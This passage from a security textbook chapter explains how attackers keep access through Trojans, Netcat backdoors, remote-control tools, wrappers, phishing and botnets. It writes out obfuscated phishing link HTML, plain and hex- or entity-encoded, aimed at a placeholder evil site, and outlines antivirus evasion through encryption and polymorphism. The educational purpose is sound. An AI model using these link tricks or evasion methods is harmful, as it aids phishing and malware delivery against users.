10 Phase 4: Maintaining Access Trojans, Backdoors, and Rootkits ... Oh My!

After completing Phase 3, the attacker has gained access to the target systems. So, the camel’s nose is under the tent. Now what? After gaining their much-coveted access, attackers want to maintain that access. This chapter discusses the tools and techniques they use to keep access and control systems. To achieve these goals, attackers utilize techniques based on malicious software such as Trojan horses, backdoors, bots, and rootkits. To understand how attacks occur and especially how to defend our networks, a sound understanding of these tools is essential.

Trojan Horses

You remember your ancient Greek history, right? The Greeks were attacking the city of Troy, which was well protected against external attacks. After numerous unsuccessful battles, the Greeks hatched an ingenious scheme to take the city. They built an immense wooden horse, which they left at the gates of Troy. The unsuspecting Trojans thought the horse was a gift from the retreating army (why anyone would think a retreating army would leave a gift is beyond me!). They brought the horse inside the gates, and, as the Trojans slept that night, the Greek warriors crept out of the horse and took the city.

Fast-forward a few millennia. Trojan horse software programs are among the most widely used classes of computer attack tools. Like their counterparts in ancient Greece, Trojan horse software consists of programs that appear to have a benign and possibly even useful purpose, but hide a malicious capability. An attacker can trick a user or administrator into running a Trojan horse program by making it appear attractive and disguising its true nature. Alternatively, bad guys can install a Trojan horse on a victim machine themselves, disguising the malicious code as some useful or expected program so that unsuspecting users and administrators cannot detect the attackers’ presence. Essentially, at some level, a Trojan horse is an exercise in social engineering: Can the attacker dupe the user into believing that the program is beneficial or con the user into running it? The moral of the story: Beware of geeks bearing gifts!

Some Trojan horse programs are merely destructive; they are designed to crash systems or destroy data. One such example of a purely destructive Trojan horse program was a DVD writer software package available for download on the Internet. This amazing gem had great functionality claims. It would convert a standard read-only DVD drive (used to install software or play movies) into a drive that could write DVDs—all through just installing this free software upgrade! According to the README file distributed with this apparently fantastic tool, you could create your own movie DVDs or back up your system with just a free software upgrade. There were only two catches to this astounding deal. First, it is simply physically impossible to do this in software when the underlying hardware is incapable of this function. Second, and tragically, the tool was a Trojan horse that deleted all contents of the poor users’ hard drives. Unfortunately, some unwitting users downloaded the tool and lost all of their data.

Whereas some Trojan horse tools are merely destructive, other Trojan horse programs are even more powerful, allowing an attacker to steal data or even remotely control systems. But let’s not get ahead of ourselves; to understand these capabilities, it’s important to explore the nature of another category of attack tools: backdoors.

Backdoors

As their name implies, backdoor software allows an attacker to access a machine using an alternative entry method. Normal users log in through front doors, such as login screens with user IDs and passwords, token-based authentication (using a physical token such as a smart card), or cryptographic authentication (such as the logon process for Windows or SSH). Attackers use backdoors to bypass these normal system security controls that act as the front door and its associated locks. Once attackers install a backdoor on a machine, they can access the system without using the passwords, encryption, and account structure associated with normal users of the machine.

The system administrator might add new-fangled, ultra-strong security controls for access to a machine, requiring super encryption and multiple passwords for any user on the box. However, with a backdoor in place, an attacker can access the system on the attacker’s terms, not the system administrator’s terms. The attacker might set up a backdoor requiring only a single backdoor password for access, or no password at all. The classic movie War Games illustrates the backdoor concept quite well. In that movie, the attacker types in the password Joshua. For the main computer in War Games, typing that password activated a backdoor that allowed the attacker, as well as the original system designer, to have complete access to the entire system.

Netcat as a Backdoor on UNIX Systems

As we discussed in Chapter 8, Phase 3: Gaining Access Using Network Attacks, a simple yet powerful example of a backdoor can be created using Netcat to listen on a specific port. You remember our good friend Netcat, the tool that is designed to simply and transparently move data around the network from any port on any machine to any other port on any other machine. Suppose an attacker has gained access to a system (perhaps using one of the techniques discussed in Chapter 7, Phase 3: Gaining Access Using Application and Operating System Attacks, or Chapter 8 such as buffer overflows or session hijacking), has broken into a user account with a login name of fred, and wants to set up a command-shell backdoor.

To use Netcat as a backdoor, the attacker must compile it with its GAPING_SECURITY_HOLE option, so that Netcat can be used to start running another program on the victim machine, attaching standard input and output of that program to the network. This option can be easily configured into Netcat while the attacker is compiling it. With a version of Netcat that includes the GAPING_SECURITY_HOLE option, the attacker can run the program with the -e flag to force Netcat to execute any other program, such as a command shell, to handle traffic received from the network. After loading the Netcat executable onto the victim machine, an attacker who has broken into the fred account on a system can type this:

Image

This command will run Netcat as a backdoor listening on local TCP port 12345. Remember, nc is the program name for Netcat. However, an attacker can call the Netcat program any other name desired. When the attacker (or anyone else, for that matter) connects to TCP port 12345 using Netcat as a client, the Netcat backdoor will execute a command shell. As we saw in Chapter 8, a Netcat client runs on the attacker’s machine to connect to a backdoor implemented as a Netcat listener on the victim machine. The attacker then has an interactive shell session across the network to execute any commands of the attacker’s choosing on the victim machine. The context of the command shell session (i.e., the account name, privileges, and the current working directory) will be the same as the attacker who executed the Netcat listener in the first place. In our example, the command was executed from an account belonging to the user fred, so the attacker using the backdoor will have fred’s privileges. Table 10.1 provides commands and explanations to show what an attacker sees on the screen when interacting with this backdoor listener. (The attacker’s keystrokes are in bold.)

Table 10.1 Attacker’s Netcat Commands and Responses for a Backdoor Listener with Explanations

Image

There are several items of interest to note in this interactive session. First, notice that no user ID and password are required when going through this particular backdoor. The attacker simply connects to port 12345 and starts typing commands, which our Netcat listener dutifully feeds into the command line for execution. Of course, an attacker could have used a specialized login routine, requiring a password to access the backdoor. Sometimes, attackers write a simple authentication script around Netcat to check a user ID and password before running the command shell. Also, note that there is no command prompt displayed for these commands. The Netcat listener running /bin/sh on Linux or UNIX does not return a command prompt, requiring the attacker to type commands without the prompt character. When using the Windows version of Netcat, the familiar c: > command prompt is displayed. Finally, notice how the commands are executed in the context of the user that started the backdoor listener. The ls command showed the contents of the working directory of the attacker when the Netcat listener was started. The whoami command showed the effective user ID to be fred, the account used by the attacker when the backdoor listener was run.

An attacker can also create a very similar backdoor on a Windows system using the Windows version of Netcat with the Windows command shell, cmd.exe. The command to execute to create such a listener is:

Image

You might wonder, “Yes, but why? If the attacker has access to the system with account fred, why set up a backdoor listener for access? Why implement a backdoor when you’ve already got access through the front door?” Good question. Attackers often establish a backdoor as a hedge against the possibility that their normal front-door access might be shut down. A backdoor, ideally, will continue to provide access for the attacker even as the system configuration changes, with users being added and deleted and services being turned off and on. What if normal SSH access goes away because a new system administrator decides to disable SSH and uses a fancy Web-based administrator console for the box? The attacker can still use a backdoor to gain access even if the original entry point is closed by a more diligent system administrator. Once attackers gain access, they want to keep it. Backdoors provide just what the attackers need: reliable, consistent access on their own terms.

The Devious Duo: Backdoors Melded into Trojan Horses

We’ve seen pure Trojan horses (the evil DVD writer example) and pure backdoors (the example with the Netcat listener executing a shell). Things get far more interesting when the two classes of tools are melded together into Trojan horse backdoors. These programs appear to have a useful function, but in reality, allow an attacker to access a system and bypass security controls—a deadly combination of Trojan horse and backdoor characteristics. Although not every Trojan horse is a backdoor, and not every backdoor is a Trojan horse, those tools that fall into both categories are particularly powerful weapons in the attacker’s arsenal.

Roadmap for the Rest of the Chapter

Throughout the rest of this chapter, we discuss several tools that fall into the Trojan horse backdoor genre, all operating at different layers of our systems: application-level Trojan horse backdoors, user-mode rootkits (which modify or replace critical operating system executable programs or libraries), and kernel-mode rootkits (which modify the kernel of the operating system). Section by section through the rest of the chapter, we dissect each of these layers one by one, examining the capabilities of malicious code at each layer and offering defenses for each. As we progress through these layers, the attacker’s ability to hide increases significantly. Table 10.2 highlights each of these classes of Trojan horse backdoors. In the table, an analogy is included to illustrate how the particular tool works. For the analogy, consider a scenario where you are trying to eat soup and an attacker is trying to poison you.

Table 10.2 Categories of Trojan Horse Backdoors

Image

As you can see, all of the tools in this class are quite powerful in the hands of attackers, with each category providing a deeper level of infiltration and control of a system. Given their power and widespread use, it is critical to understand how these tools are used and how to defend against them. As we look at each level of malicious code in more detail, we’ll return to that “Analogy” column from Table 10.2 to get a feel for how each specimen of Trojan horse backdoor impacts your system, as though you were eating a bowl of poisoned soup. We analyze each category of Trojan horse backdoor, starting our detailed analysis by looking at the very popular application-level Trojan horse backdoors.

Nasty: Application-Level Trojan Horse Backdoor Tools

As described in Table 10.2, application-level Trojan horse backdoors are tools that add a separate application to a system to give the attacker a presence on the victim machine. This software could provide the attacker with backdoor command-shell access to the machine, give the attacker the ability to control the system remotely, or even harvest sensitive information from the victim. The application-level Trojan horse backdoor analogy of Table 10.2 involves an attacker adding poison to your bowl of soup. A foreign entity has been introduced into your meal, allowing an attacker access to your tummy.

An enormous number of application-level Trojan horse backdoors have been developed for Windows platforms of all types. Because of the use of Windows on millions of computers worldwide, attackers want to exercise control over these machines. Although the techniques discussed in this section could also be applied to Linux or UNIX machines (or any type of general-purpose operating system for that matter), they are most widely used on Windows systems, due to the prevalence of Windows on the desktop. Application-level Trojan horse backdoors come in a variety of flavors, each with a separate focus in allowing the bad guy to achieve some goal. Let’s zoom in on three different types of application-level Trojan horse backdoors that support different attacker goals: remote-control backdoors, bots, and spyware.

Remote-Control Backdoors

What can the poison in your belly allow the attacker to do on your machine? First, application-level Trojan horse backdoors can give an attacker the ability to control a system across the network. If an attacker can get one of these beasts installed on your laptop, desktop, or server, the attacker will “0wn” your machine, having complete control over the system’s configuration and use. With a remote-control backdoor, the attacker can read, modify, or destroy all information on the system, from financial records to other sensitive documents, or whatever else is stored on the machine. Critical system applications can be stopped, impacting Internet services or Windows-controlled machinery and equipment.

Demonstrating the power of remote-control backdoors in the hands of skilled attackers, Microsoft itself appears to have been attacked with this type of tool in October 2000. Based on reports in the media, it appears that a Microsoft employee working from home was the victim of an application-level Trojan horse backdoor called QAZ. Once installed on the telecommuter’s computer, the Trojan horse spread itself around Microsoft’s corporate network, gathering passwords and allowing the attackers to snoop around, even viewing source code from Microsoft products.

Figure 10.1 shows the simple architecture of these tools. The attacker installs or tricks the user into installing the remote-control backdoor server on the target machine. Once installed, the backdoor server waits for connections from the attacker, or polls the attacker asking for commands to execute. The attacker uses a specialized remote-control client tool to generate the command for the remote-control backdoor server. When it receives a command, the remote-control backdoor executes the commands and sends a response back to the client. The attacker installs the client on a separate machine, and uses it to control the server across a network, such as an organization’s intranet or the Internet itself.

Figure 10.1 An attacker uses a remote-control backdoor to access and control a victim across the network.

Image

Software developers in the computer underground have released thousands of tools with the exact same architecture shown in Figure 10.1. Sadly, it almost seems like a rite of passage for some in the computer underground to create a remote-control backdoor and release it publicly. To demonstrate their coding skills, numerous attackers craft a remote-control tool for Windows, release it to the world, and then move on to bigger and better attacks, including the rootkit tools we discuss later in this chapter. When these remote-control backdoor tools are initially released, the antivirus vendors scramble to devise new signatures to detect each one. For a short time after release, however, signatures don’t yet exist, making the bad guy’s job easier.

The Megasecurity Web site at www.megasecurity.org lists thousands of remote-control backdoor tools. This very comprehensive site is maintained by Aphex, Da_Doc, Magus, and MasterRat. This team provides a comprehensive inventory, listing each tool’s name, author, country of origin, and a screenshot showing the user interface. They also include a list of TCP and UDP port numbers used by each remote-control backdoor, the registry keys it modifies or adds, and a brief summary of the tool’s functionality. Although Megasecurity offered the code of each tool for download in the past, they currently do not distribute the software itself anymore. Now, the site is focused on providing a comprehensive inventory of these tools, with a list sorted by month of release from March 2000 through today. Some months have a relatively small number of tools released (a dozen), but many months have more than 50 of these darn things! Figure 10.2 shows a small sample of the user interfaces of some of the items inventoried at Megasecurity.

Figure 10.2 A small sampling of remote-control backdoors at Megasecurity. Note the different languages and styles, yet all use the same remote-control client–server architecture.

Image

Whenever I’m investigating an attack associated with a remote-control backdoor, I typically search the Megasecurity site based on the Registry keys, port numbers, or file artifacts I’ve found associated with the attacker’s tool. Although the Megasecurity site offers its own built-in search capability, I prefer using Google’s handy “site:” directive that we discussed in Chapter 5, Phase 1: Reconnaissance, to scour through Megasecurity’s records. I frequently perform Google searches for site:megasecurity.org followed by the port number, Registry key name, and file name that I’ve discovered in the wild during an investigation. Note that this technique of looking for file names and related artifacts via search engines is just the starting point of an investigation. I also often move the evil specimen to an isolated laboratory system without any sensitive data loaded on it. There, I run the evil program to observe its capabilities before completely restoring the deliberately infected system to its original state.

Another huge list of remote-control backdoor tools (running on a variety of Windows and non-Windows platforms) is maintained by Joakim von Braun (of von Braun Consultants) at www.simovits.com/nyheter9902.html. The von Braun list shows the names and default ports used by each Trojan horse backdoor tool. Although hundreds of varieties of these backdoor Windows tools exist, the script kiddie masses focus on a small number of these tools. Based on my observations of these tools in the wild, the most popular Windows remote-control tools are the following (in decreasing order of popularity):

  • The Virtual Network Computing (VNC) tool, a free, cross-platform (UNIX and Windows) tool used for legitimate remote administration but often abused as a backdoor, freely available at www.realvnc.com.
  • Dameware, a legitimate commercial remote-control tool available for a fee, but also with a free demo version, at www.dameware.com. Like VNC, this normally legitimate tool is sometimes abused by attackers as a backdoor.
  • Back Orifice 2000, at www.bo2k.com, one of the first and most powerful tools in this category.
  • SubSeven, a very popular remote-control backdoor suite, with several competing versions available on the Internet.
What Can a Remote-Control Backdoor Do?

Although the functionality of various remote-control backdoors varies, most of them draw from a basic set of similar underlying functions. One particular tool might offer better control of the GUI (such as VNC), whereas others might include more control over local resources, including the hard drive, memory, and file system (such as BO2K). Still others excel at acting as a relay in moving traffic across the network to obscure the location of the attacker (such as SubSeven). Although particular tool functionality varies, Table 10.3 provides a round-up of various capabilities included in a majority of the tools listed at the Megasecurity Web site.

Table 10.3 A Sampling of Remote-Control Backdoor Functionality

Image

Image

Image

Image

As an example of these capabilities implemented in one venerable remote-control backdoor, consider Figure 10.3, which shows an image of the BO2K screen. The attacker has configured BO2K to watch the GUI of the victim, dump the encrypted password representations from the target machine, and activate a keystroke logger. The attacker is now about to take over mouse control of the victim system.

Figure 10.3 BO2K in use.

Image

What Is So Evil About That?

With these capabilities, most remote-control backdoors look remarkably like legitimate remote-control programs designed for system administrators and remote users, such as the commercial tools Symantec’s pcAnywhere, Altiris Carbon Copy, VNC, Dameware, Laplink, or even Microsoft’s own built-in Windows Remote Desktop utility. Indeed, many remote-control backdoor tools do the same thing as these useful remote-control programs, and in some cases, have added capabilities, together with source code. In fact, as we discussed earlier, attackers abuse some of the legitimate commercial tools such as VNC and Dameware, using them for illicit remote control.

In a sense, remote-control tools, whether created by commercial companies, open source developers, or the computer underground, are like a hammer. You can use a hammer to build a house, or you can hit someone in the head with it. It’s the user motivation that determines whether the tool is used for evil, and nothing in the tool itself. The tool can be used by the white hats (i.e., legitimate system administrators and security personnel) or the black hats (i.e., the attackers).

Build Your Own Trojans Without Any Programming Skill!

How does an attacker get a remote-control backdoor installed on the victim machine? Most often, the attackers trick the victim user into installing it. But there’s a catch: If I e-mail you a program titled Evil Backdoor or even VNC, you probably won’t run it (although, lamentably, some users will run anything you send them). One of the most popular methods for distribution of malicious code today remains mass e-mailing. Every day, millions of spoofed e-mails are sent from infected machines to everyone in the e-mail contact list of the infected machine, containing an attachment that implements an application-level Trojan horse backdoor. Because they use the harvested e-mail addresses from one victim’s e-mail contact list, these spoofed e-mail messages might appear to be legitimate, because they appear to be sent by an acquaintance. Increasingly, we are seeing highly skilled attackers sending targeted e-mail with Trojan horse backdoor attachments into specific companies and government organizations, designed to infiltrate those targets on behalf of an attacker. With a spoofed source e-mail address making the message appear to come from an important contact in the target, such as a CEO or other high-ranking person, the odds that the e-mail attachment will be executed increase massively.

To further increase the likelihood that a user will install the backdoor, the computer underground has released programs called wrappers or binders. These tools are useful in creating Trojan horses that install a remote-control backdoor. A wrapper attaches a given .EXE application (such as a simple game, an office application, or any other executable program) to the remote-control backdoor server executable (or any other executable, for that matter). The two separate programs are wrapped together in one resulting executable file that the attackers can name anything they want. Two executables enter the wrapper, and one executable leaves with the blended functionality of both input programs.

When the user runs the resulting wrapped executable file, the system first installs the remote-control backdoor, and then runs the benign application. The user only sees the latter action (which will likely be running a simple game or other program), and is duped into installing the remote-control backdoor. By wrapping a remote-control backdoor server around an electronic greeting card, I can send a birthday greeting that will install the backdoor as the user watches a birthday cake dancing across the screen. These wrapping programs are essentially do-it-yourself Trojan horse creation programs, allowing anyone to create a Trojan horse without doing any programming.

Numerous wrapper programs have been released, including Silk Rope, Saran-Wrap, EliteWrap, AFX File Lace, and Trojan Man. The AFX File Lace and Trojan Man programs even encrypt the malicious code before the wrapping process occurs, a process illustrated in Figure 10.4. That way, antivirus programs with signatures for the malicious code will not be able to detect the encrypted, wrapped malicious code, because the encrypted code no longer matches the signatures. To make this encrypted code functional, however, these wrappers include additional embedded software in the resulting output program that decrypts the malicious code when the combined package is executed on the victim machine. Of course, the antivirus vendors have created signatures to detect the decryption software employed by AFX File Lace and Trojan Man. Still, in future versions of these types of wrappers, we might see decryptors that dynamically alter their code to evade antivirus signatures. By recoding itself on the fly, such software would morph itself as it runs, altering its code, but not its functionality, by choosing from functionally equivalent machine-language instructions. Software implementing this technique is known as polymorphic code. This fancy term applies to pieces of code that have the exact same functionality, but a different set of instructions. With polymorphic code, an antivirus signature that detects one version of the code will not be able to detect the other, functionally equivalent, code. Yet, although the signature doesn’t match, the functionality does. Using a sophisticated wrapper with polymorphic capabilities, an attacker could create morphed decryptors that evade detection.

Figure 10.4 Wrapping two executables into a single package, and using encryption to evade antivirus tools.

Image

But Where Are My Victims?

One of the fundamental problems with these application-level Trojan horse backdoor tools, from an attacker’s perspective, involves knowing where the ultimate victims are. Consider a scenario where an attacker uses a wrapper program to create a holiday greeting card with a remote-control backdoor wrapped up inside. The bad guy sends the resulting package via e-mail to one victim. This victim runs the program and loves the dancing ornaments and jamming holiday tunes. The unsuspecting victim wants to spread this holiday cheer with other people, forwarding the pretty but poisonous e-mail to two friends. These two friends like the holiday greeting as well, and forward it to two friends, and so on, and so on, infesting hundreds or even thousands of computers with the remote-control backdoor. Ultimately, the attacker doesn’t know who all the victims are, and cannot remotely control them without knowing the victim’s IP address. After all, the remote-control client requires the attacker to enter in the IP address of the victim to be controlled. How can an enterprising attacker solve this dilemma?

To solve this problem, some of the remote-backdoor programs, including BO2K and SubSeven, include notification functionality to alert the bad guys when a new victim falls under their control. Some of these tools advertise the fact that a system with a remote-control backdoor on it has started up by sending an e-mail to the attacker in effect saying, “Come and get me!” Now, e-mail can take several minutes to propagate across the Internet. Attackers in a hurry might want realtime notification about a new victim, rather than waiting for e-mail to arrive. Impatient attackers sometimes rely on notification via an Internet Relay Chat (IRC) channel to announce a new remote-control backdoor server in real time. Beyond this announcement capability for newly infected systems, we’ll look at additional uses of IRC for application-level Trojan horse backdoors later in this chapter, when we cover bots.

Shipping Remote-Control Backdoors via the Web: ActiveX Controls

Remote-control backdoors get even more powerful when melded with some of the active content mechanisms on the World Wide Web. ActiveX is a Microsoftdeveloped technology for distributing executable content via the Web. Like Sun’s Java, ActiveX sends code from a Web server to a browser, where it is executed.

These individual applications are referred to as ActiveX controls. Unlike Java applets, which are confined to a sandbox that limits their ability to attack the host machine, an ActiveX control can do anything on users’ machines that the users themselves can do: alter the configuration, delete files, send data anywhere on the network, and so on. You simply surf to my Web site with a browser configured to run ActiveX controls, and my Web server pumps an ActiveX control including a remote-control backdoor server to your browser, which runs the program and installs my evil code without your noticing.

Microsoft has engineered ActiveX controls to run only if they have a proper digital signature, using Microsoft’s Authenticode technology. Unfortunately, users can disable this signature check in their browsers, allowing some very nasty code to run on their systems. Alternatively, an improperly signed or unsigned ActiveX control forces most browsers to prompt a user asking whether the untrusted code should be executed. Most users unwittingly click OK without realizing that they’ve just given control of their machines over to an attacker.

Trojan Horses of a Different Color: Phishing Attacks and URL Obfuscation

As we have seen, attackers frequently distribute backdoor software as e-mail attachments. However, another Trojan horse activity associated with e-mail has no attachment at all, but instead a link to a Web site that appears to belong to a legitimate online enterprise. In these so-called phishing attacks, the bad guys spew thousands or millions of e-mail messages to a target list of addresses harvested from victim machines. These e-mails are spoofed to appear to come from a trusted source such as a bank, e-commerce company, or other financial services organization dealing with sensitive data. Some of these phishing e-mails are quite convincing, exhorting users to click on the link to reset their password, review recent purchase activity, or otherwise log in to their account to handle an urgent situation. But, of course, the link in the e-mail points not to the legitimate Web site, but instead to a cleverly disguised Web site controlled by the attacker. When an unsuspecting user clicks the link and sees what appears to be the e-commerce site, he or she might fill in critical account information, including credit card numbers, Social Security numbers, or banking account numbers. The bogus Web site, operated by the attacker, then dutifully harvests this sensitive information on behalf of the bad guys, who will later use it for fraudulent transactions or full-scale identity theft.

With phishing, instead of distributing a Trojan horse backdoor as an e-mail attachment, the e-mail simply points to a Web site that is itself the Trojan horse. It sure looks like the user’s bank, but it is, in fact, an evil duplicate.

The links included in phishing e-mails are actually accessing the attacker’s site, but trick a user in any one of a variety of ways. The attackers want their links in the e-mail to appear to point to the legitimate site, but to access their own evil site when clicked. Often, the attackers use an <HREF> tag to display certain text for the link on an HTML-enabled e-mail client screen, with the link actually pointing somewhere else.

First, and perhaps most simply, the attacker could dupe the user by creating a link that displays the text www.goodwebsite.org on the screen but really links to an evil site. To achieve this, the attacker could compose a link like the following and embed it in an e-mail message or on a Web site:

<A HREF=“http://www.evilwebsite.org”>www.goodwebsite.org</A><p>

Most HTML-rendering mail clients screen merely show a hot-link labeled www.goodwebsite.org. When a user clicks it, however, he or she will be directed to www.evilwebsite.org. Browser history files, proxy logs, and filters, however, will not be tricked by this mechanism at all, because the full evil URL is still sent in the HTTP request, without any obscurity. This technique is designed to fool human users only. Of course, although this form of obfuscation can be readily detected by viewing the source HTML of the e-mail message, it will still trick many victims and is commonly utilized in phishing schemes.

More subtle methods of disguising URLs can be achieved by combining this tactic with a different encoding scheme for the evil Web site URL. The vast majority of browsers and e-mail clients today support encoding URLs in a hex representation of ASCII or in Unicode (a 16-bit character set designed to represent more characters than plain old 8-bit ASCII). Using any ASCII-to-Hex-to-Unicode calculator, such as the handy free online tool at http://www.mikezilla.com/exp0012.html, an attacker could convert www.evilwebsite.org into the following ASCII or Unicode representations and include them in an HREF tag:

  • <A HREF=“http://%77%77%77%2E%65%76%69%6C%77%65%62%73%69%74%65%2E%6F %72%67">www.goodwebsite.org</A><p>
  • <A HREF=“http://&#119;&#119;&#119;&#46;&#101;&#118;&#105;&#108;&#119;&#101;&#98; &#115;&#105;&#116;&#101;&#46;&#111;&#114;&#103">www.goodwebsite.org</A><p>

These tactics just scratch the surface of the several dozen mechanisms bad guys use to obscure their URLs. Other tactics include sending Javascript in the message that encrypts the e-mail content, including the URLs, only decrypting it when it is displayed in a mail reader or browser’s HTML rendering engine and run. If a user views the source of the message, the decrypting script will be displayed, along with a bunch of cryptographic gibberish. Other URL obscuring tactics involve including special characters in the URL that make browsers have problems displaying a full URL, such as the %01 character, which would make old versions of Internet Explorer stop displaying all parts of the URL after that character.

These phishing and URL obscuring attacks get even more insidious when combined with the evil SSL manipulation techniques we discussed in Chapter 8. A bad guy could generate an SSL certificate that appears to be from a bank or e-commerce company. When a user clicks the link in a phishing e-mail, an SSL connection is established with the attacker’s own Web server. At this point, the browser might alert the user that the certificate does not appear to be signed by a legitimate Certificate Authority. The security of the situation is then all left in the user’s hands. Will the user allow this unsecured connection and then supply the attacker’s Web site with sensitive information? Sadly, many users will, completely overriding any security that might have been offered by SSL. Phishing, URL obfuscation, and SSL trickery are a truly devious combination that we face on a regular basis today, making it very difficult for users to keep their information secure.

Also Nasty: The Rise of the Bots

The remote-control backdoors we’ve been discussing are designed so that the bad guy can have complete control over a machine, one victim at a time. The attacker can log in to his new prey, control it, log out, and then move on to control a different victim. However, another class of application-level Trojan horse backdoor raises the ante significantly: bots. Bots are simply software programs that perform some action on behalf of a human on large numbers of infected machines. Unlike the one-at-a-time architecture of remote-control backdoors, bots are designed for economies of scale. Using bot software, a single attacker could have dozens, hundreds, thousands, or even more systems under control simultaneously, each with bot software installed to maintain and coordinate that control, as illustrated in Figure 10.5. An attacker installs bots or tricks users into installing them on as many machines as possible, the more the merrier (for the attacker, that is).

Figure 10.5 Bots are designed to be used en masse, increasing the economies of scale of the bad guy’s attack.

Image

Collections of bots under the control of a single attacker are called bot-nets, and the people controlling such systems are sometimes called bot-herders, a name that conjures images of a cowboy sitting at a laptop corralling digital “cattle.” With thousands or hundreds of thousands of bots, a bot-herder can cause significant damage. Indeed, the largest bot-net our team has handled involved 171,000 systems under the control of a single attacker! The attacker could have collectively utilized the resources of all of those victim machines, which included home user systems connected to DSL and cable-modem lines, university machines in computer centers and dorm rooms, corporate computers on vast intranets, and government machines scattered all over the Internet.

Bots originated in the early 1990s as a tool to maintain control of an IRC channel. Some owners and users of various IRC channels noticed that when they logged out of a channel, an attacker would grab control of the channel or take over their chat username with a bot. Once in control of the channel, the attacker would kick his or her enemies out of the channel and allow in only those who curried favor with the intruder. The bot would monitor the channel and grab control when the channel owner or user left. To help minimize this kind of attack, the channel owners themselves turned to bots, making sure they never gave up control of the channel in the first place by employing a bot to periodically send keep-alive traffic to the IRC channel. Of course, an arms race quickly erupted, with the bad guys deploying more and more bots to gang up on the channel owners’ own bots, trying to force them out. Although these little bot skirmishes of yesteryear fighting over IRC turf were certainly entertaining, newer bots have gone mainstream with far more functionality.

Dozens of bot variations are available today, with source code available freely for download and customization. Some of the most popular and prolific are the phatbot family (which includes more than 500 variations based on tweaks of the same original code, with names like phatbot, gaobot, agobot, and forbot), the sdbot family (which includes sdbot, rbot, and others), and the mIRC bot family. Each of these specimens includes very modular code, which is rapidly being updated by the attacker community. Because the code is so modular and available in its original source code format, new mutant strains of bots arise almost every day on the Internet. Whereas some bots are cobbled together out of poorly written code (such as the sdbot family), others are very elegantly written, finely tuned for their malicious purposes (such as the phatbot family). In fact, one bot researcher commented on the high quality of the phatbot code by saying, “The code reads like a charm; it’s like dating the devil.”

From a functionality perspective, most bots include numerous actions that the bot can take when it receives commands from the attacker across the network. The phatbot family includes more than 100 different functions, each in a modular block of code the attacker can choose to embed in the bot or leave out if the given function is not desired. Variations of phatbot include all of the functionality we analyzed for remote-control backdoors, including all of the features of Table 10.3, such as a remote command shell, remote registry alterations, and streaming video and audio of a victim machine. However, bot functionality has evolved even further than the Table 10.3 backdoor capabilities, including special features that take advantage of a large number of infected systems in a bot-net. Table 10.4 includes some bot-specific features.

Table 10.4 A Sampling of Bot Functionality

Image

Most bot-nets, including variations of phatbot, sdbot, and mIRC bots, are controlled via IRC, a protocol that gives the attackers numerous advantages. First, many networks, especially those ripe with poorly secured systems like home user machines and university student systems, allow outbound IRC communication. But even more important, IRC offers the attackers a built-in one-to-many communications path, in effect implementing a multicast channel. Think about it. If an attacker wants to send a single command to 171,000 bot-infected machines, the bad guy could write code that creates this message once and then sends it to each of the 171,000 machines, one at a time. That’s a time-consuming process, even for software on a relatively fast machine. IRC is a much more efficient bot communication channel. The various bots in the bot-net are all configured to log into a single IRC channel. The attacker then logs into this channel and sends commands across the channel to all of the bots, which then execute the commands. The attacker doesn’t even need to use a specialized client to control the bots. Instead, the bad guy can log into the channel using any IRC client, and type special bot-control commands into the channel to make the bots do his or her bidding. There’s no need to replicate the message 171,000 times, because IRC does that automatically. This use of IRC also lets the bots poll the attacker for commands, initiating an outbound connection from the bot-infected system to an IRC server. If the victim machine’s personal firewall blocks inbound connections, that’s okay for the attacker, whose commands are riding into the victim on an outbound IRC session. By default, IRC traffic is carried over TCP port 6667 listening on the IRC server. Most bots today still use this default IRC port, although attackers are increasingly using the same IRC protocol, but configuring their IRC servers to listen on a different TCP port. That way, their actions are a bit stealthier, without the telltale TCP port 6667 instantly tipping off investigators.

Although most bots use IRC today, a small number of them are employing other even more powerful protocols for communication with the attacker. IRC has numerous benefits for the bad guys, but it has one significant problem: its reliance on one or a small number of IRC servers to carry the message to all of the bots. If an investigator shuts down the IRC server or removes the particular channel used by the bot-net, the attacker is out of business with a headless bot-net the attacker cannot control. To alleviate this problem, some variations of phatbot employ another very pernicious method of communication, a peer-to-peer protocol called Waste. Originally created by America Online for file sharing among users, Waste is a highly distributed communication mechanism, without a centralized server to coordinate communications. Using the Waste protocol, various bot-infected machines automatically discover each other by scanning for a certain attacker-chosen TCP port. Once they discover each other, each bot keeps the other bots up to date regarding commands received from the attacker by shipping the commands across the network to all other bot-infected systems that were discovered. So, suppose an attacker has a bot-net of 171,000 systems, controlled via Waste. The attacker can inject commands into any one or more of these machines, which will dutifully relay that command to other systems on the bot-net, which will carry the command further to other systems in the bot-net, and so on and so forth until all of the massed hordes receive the attacker’s information. Now, suppose an investigator discovers some systems on the bot-net and shuts them down. Let’s assume that we’ve got an amazing investigator who is able to prune 30,000 bots off of this bot-net, removing the bot software from each of those machines. Is the attacker out of business now? Hardly! Using Waste, the remaining systems will continue to communicate the attacker’s wishes. With Waste, the bad guys have a much more resilient protocol than IRC. Expect to see much more of this kind of bot communication in the future.

One additional bot feature included in some variants of the phatbot family is worth noting: the ability to detect a virtual machine environment. Some bot authors recognized that the good guys are researching the latest bots by running them in a virtual machine environment, such as VMware or VirtualPC, to perform dynamic analysis of the bot’s behavior. These virtual machine tools let a user run one or more guest operating systems on top of a host operating system. With these tools, you could run three or four Windows machines on a single Linux box, or vice versa. Whenever I’m looking at the latest bot myself to see how it functions, I instinctively run the tool in VMware. If the bot under analysis hoses up my virtual machine, VMware lets me revert to the last good virtual machine image, quickly and easily removing all traces and damages of the bot without having to reinstall my operating system.

Yet, because so many researchers rely on virtual machine environments to analyze malicious code such as bots, the bad guys are trying to foil our analysis. Some phatbot specimens check to see if they are running in a virtual machine. If so, they shut off some of their more dastardly functionality so that researchers cannot observe it. This capability reminds me of some of the actions of my own children. My son sometimes gets into fights with my daughter while I’m in the other room. I hear a huge commotion and the upset shouts of my daughter, a sure sign that the boy has done something wrong. Yet, when I walk into the room to scope out the situation, my son almost always smiles at me with a look of pure innocence on his face, as if to say, “I’ve done nothing wrong, Daddy. Please move on.” Malicious code, in the form of virtual-machine-detecting bots, sometimes operates in the same manner when a researcher is investigating its capabilities.

Most of today’s bots detect virtual machines in a very lame fashion by looking for virtual machine environment artifacts in the file system, Registry, and running process of the machine. If the bot finds any of the files, Registry keys, or processes associated with VMware or VirtualPC, it alters its functionality. However, these types of artifacts are typically created in the host operating system, and are often left out of the guest operating system itself, where the researcher typically executes the bot. Thus, most of today’s virtual-environment-detecting capabilities can be trivially fooled. But that won’t always be the case.

